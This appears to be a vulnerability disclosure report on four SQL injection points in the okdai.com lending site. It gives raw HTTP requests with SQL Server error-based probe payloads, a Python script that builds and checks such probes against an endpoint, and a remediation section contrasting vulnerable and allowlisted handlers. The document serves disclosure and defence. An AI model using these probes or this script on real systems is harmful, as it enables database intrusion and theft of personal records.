P2P financial security: multiple SQL injection vulnerabilities on an OK Loan (okdai.com) site, exposing 15 databases and about 250,000 records
Injection Point 1:
POST /Website/abouts/DeleteAboutsRemove HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=accept; accept=Accept,accept; accept=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

param%5B0%5D=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(78)%2bCHAR(52)%2bCHAR(100)%2bCHAR(51)%2bCHAR(119)%2bCHAR(51)%2bCHAR(88)%20FROM%20syscolumns

Injection parameter: param%5B0%5D

Injection Point 2:
POST /Website/Feedback/GetFeedbackList HTTP/1.1
Content-Length: 197
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=accept; accept=Accept,accept; accept=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(74)%2bCHAR(115)%2bCHAR(55)%2bCHAR(81)%2bCHAR(55)%2bCHAR(52)%2bCHAR(87)%2bCHAR(50)%20FROM%20syscolumns)

Injection parameter: sort

Injection Point 3:
POST /Website/Home/GetFriendDatas HTTP/1.1
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=accept; accept=Accept,accept; accept=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(118)%2bCHAR(74)%2bCHAR(50)%2bCHAR(51)%2bCHAR(81)%2bCHAR(88)%2bCHAR(84)%2bCHAR(111)%20FROM%20syscolumns)&StrKey=e

Injection parameter: sort

Injection Point 4:
POST /Website/News/VidelListDetail HTTP/1.1
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=accept; accept=Accept,accept; accept=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(117)%2bCHAR(114)%2bCHAR(108)%2bCHAR(79)%2bCHAR(76)%2bCHAR(54)%2bCHAR(105)%2bCHAR(53)%20FROM%20syscolumns)

Injection parameter: sort
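All four requests use the same SQL Server error-based probe: CONVERT(int, <CHAR() chain>) forces a type-conversion error whose message echoes the string being converted, and the CHAR() chain spells out a random marker (for example, the chain in Injection Point 1 decodes to 4CuQN4d3w3X), so seeing that marker inside a "Conversion failed when converting the varchar value ..." error in the response proves the value reached the database unquoted. The script below is an added example, not the reporter's tooling or the site's code: it decodes the markers from the report's own payloads, builds the same kind of probe for a fresh marker, and checks a response for the leaked marker. The error page and the fake_vulnerable_server stand-in are constructed for the offline demonstration and are not responses captured from okdai.com.

```python
"""Decode and reproduce the MSSQL error-based probes from the report (offline)."""
import re
import urllib.parse

# The injected values from the four request bodies in the report, as sent (URL-encoded).
REPORT_PAYLOADS = {
    "/Website/abouts/DeleteAboutsRemove param[0]":
        "(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(78)"
        "%2bCHAR(52)%2bCHAR(100)%2bCHAR(51)%2bCHAR(119)%2bCHAR(51)%2bCHAR(88)%20FROM%20syscolumns",
    "/Website/Feedback/GetFeedbackList sort":
        "(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(74)%2bCHAR(115)"
        "%2bCHAR(55)%2bCHAR(81)%2bCHAR(55)%2bCHAR(52)%2bCHAR(87)%2bCHAR(50)%20FROM%20syscolumns)",
    "/Website/Home/GetFriendDatas sort":
        "(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(118)%2bCHAR(74)"
        "%2bCHAR(50)%2bCHAR(51)%2bCHAR(81)%2bCHAR(88)%2bCHAR(84)%2bCHAR(111)%20FROM%20syscolumns)",
    "/Website/News/VidelListDetail sort":
        "(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(117)%2bCHAR(114)"
        "%2bCHAR(108)%2bCHAR(79)%2bCHAR(76)%2bCHAR(54)%2bCHAR(105)%2bCHAR(53)%20FROM%20syscolumns)",
}

# SQL Server's wording for a failed string-to-int conversion; group 1 is the leaked value.
MSSQL_CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the n?varchar value '([^']*)' to data type int",
    re.IGNORECASE,
)

# Constructed sample of an unhandled-error page (the SQL Server sentence is real, the HTML is made up).
SAMPLE_ERROR_RESPONSE = (
    "<html><body><h2>Server Error in '/' Application.</h2>"
    "Conversion failed when converting the varchar value '4CuQN4d3w3X' to data type int."
    "</body></html>"
)


def decode_char_chain(payload: str) -> str:
    """Turn CHAR(52)+CHAR(67)+... (URL-encoded or not) back into the literal marker."""
    text = urllib.parse.unquote(payload)
    codes = re.findall(r"CHAR\((\d+)\)", text, flags=re.IGNORECASE)
    return "".join(chr(int(c)) for c in codes)


def build_probe(marker: str) -> str:
    """Build the same probe shape as the report: CONVERT(int, <marker as CHAR() chain>) FROM syscolumns.
    The CHAR() chain avoids quote characters, so the probe survives naive quote filtering."""
    chain = "+".join(f"CHAR({ord(ch)})" for ch in marker)
    return f"(select convert(int,{chain}) FROM syscolumns)"


def is_injectable(response_body: str, marker: str) -> bool:
    """True only if the conversion error came back carrying exactly our marker."""
    match = MSSQL_CONVERSION_ERROR.search(response_body)
    return match is not None and match.group(1) == marker


def check_endpoint(send, path: str, fields: dict, inject_into: str, marker: str) -> bool:
    """Inject the probe into one form field and submit it through `send(path, body)`.
    `send` is whatever transport you use (for a live test, an HTTP client); here a stand-in."""
    probe = dict(fields)
    probe[inject_into] = build_probe(marker)
    # quote (not quote_plus) reproduces the %20-style encoding seen in the report.
    body = urllib.parse.urlencode(probe, quote_via=urllib.parse.quote)
    return is_injectable(send(path, body), marker)


def fake_vulnerable_server(path: str, body: str) -> str:
    """Constructed stand-in (not okdai.com) for an endpoint that concatenates form fields into
    SQL and returns raw SQL Server errors: it models the symptom, nothing else."""
    for values in urllib.parse.parse_qs(body).values():
        for value in values:
            if "convert(int" in value.lower():
                leaked = decode_char_chain(value)
                return f"Conversion failed when converting the varchar value '{leaked}' to data type int."
    return "<html>ok</html>"


if __name__ == "__main__":
    for where, payload in REPORT_PAYLOADS.items():
        print(f"{where}: marker {decode_char_chain(payload)}")
    fields = {"order": "DESC", "page": "1", "rows": "15", "sort": "id"}
    print("stand-in vulnerable:",
          check_endpoint(fake_vulnerable_server, "/Website/Feedback/GetFeedbackList", fields, "sort", "4CuJs7Q74W2"))
```

When run against a real target, is_injectable must compare the full marker, not just look for the error sentence: a site that throws conversion errors on its own would otherwise produce false positives.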
Solution:
Filter and validate every request parameter before it reaches SQL. The four endpoints are injectable because sort (and param[0]) are concatenated straight into the query: pass values as bound parameters, and for ORDER BY fields, which cannot be bound, accept only column names and directions from a fixed allowlist. Also stop returning raw SQL Server error messages to the client, since the CONVERT(int, ...) probes above rely on that error text to confirm the injection.
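The pattern behind the sort/order and param[0] injection points, next to a filtered form, as an added example that is not the site's code. It uses an in-memory SQLite table as a stand-in for the site's SQL Server (the concatenation bug is identical on both), constructed rows, and assumed column names; the hardened list handler allowlists the ORDER BY column and direction and binds the rest, and the hardened delete handler casts the id before binding it.

```python
"""Vulnerable vs. filtered handlers for the report's sort/order and param[0] parameters."""
import sqlite3

# Injection Point 2's sort value, URL-decoded (from the report).
REPORT_SORT_PAYLOAD = ("(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(74)+CHAR(115)"
                       "+CHAR(55)+CHAR(81)+CHAR(55)+CHAR(52)+CHAR(87)+CHAR(50)) FROM syscolumns)")

ALLOWED_SORT_COLUMNS = {"id", "title", "created_at"}  # assumed column names for the demo table
ALLOWED_ORDER = {"ASC", "DESC"}


def setup_demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's feedback table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE feedback (id INTEGER PRIMARY KEY, title TEXT, created_at TEXT)")
    conn.executemany("INSERT INTO feedback VALUES (?, ?, ?)",
                     [(1, "alpha", "2016-04-01"), (2, "bravo", "2016-04-02"), (3, "charlie", "2016-04-03")])
    conn.commit()
    return conn


def run(conn, sql, params=()):
    """Execute and return rows, or the raw DB error text: that text reaching the client is
    exactly the channel the report's CONVERT(int, ...) probes read."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"


def vulnerable_feedback_list(conn, sort, order, page, rows):
    # Every form field is concatenated into the statement, as the injection points imply.
    sql = (f"SELECT id, title FROM feedback ORDER BY {sort} {order} "
           f"LIMIT {rows} OFFSET ({page}-1)*{rows}")
    return run(conn, sql)


def validate_sort(sort, order) -> bool:
    """Allowlist check for the two ORDER BY pieces that cannot be bound as parameters."""
    return sort in ALLOWED_SORT_COLUMNS and order.upper() in ALLOWED_ORDER


def safe_feedback_list(conn, sort, order, page, rows):
    if not validate_sort(sort, order):
        raise ValueError("sort/order not in allowlist")
    page, rows = int(page), int(rows)  # anything non-numeric fails here, never inside SQL
    sql = f"SELECT id, title FROM feedback ORDER BY {sort} {order.upper()} LIMIT ? OFFSET ?"
    return run(conn, sql, (rows, (page - 1) * rows))


def vulnerable_delete(conn, raw_id):
    # The param[0] endpoint: the id is dropped into the WHERE clause unquoted.
    return run(conn, f"DELETE FROM feedback WHERE id = {raw_id}")


def safe_delete(conn, raw_id):
    return run(conn, "DELETE FROM feedback WHERE id = ?", (int(raw_id),))


if __name__ == "__main__":
    db = setup_demo_db()
    print("vulnerable, normal:", vulnerable_feedback_list(db, "title", "DESC", "1", "2"))
    print("vulnerable, probe: ", vulnerable_feedback_list(db, REPORT_SORT_PAYLOAD, "DESC", "1", "15"))
    print("safe, normal:      ", safe_feedback_list(db, "title", "desc", "1", "2"))
    print("safe, probe:       ", validate_sort(REPORT_SORT_PAYLOAD, "DESC"))
```

The vulnerable list handler hands the probe to the database, and whatever the engine says about it ("SQL error: ...") is what the attacker gets back; the filtered handler rejects the same input before any query is built, which also means no database error text exists to leak.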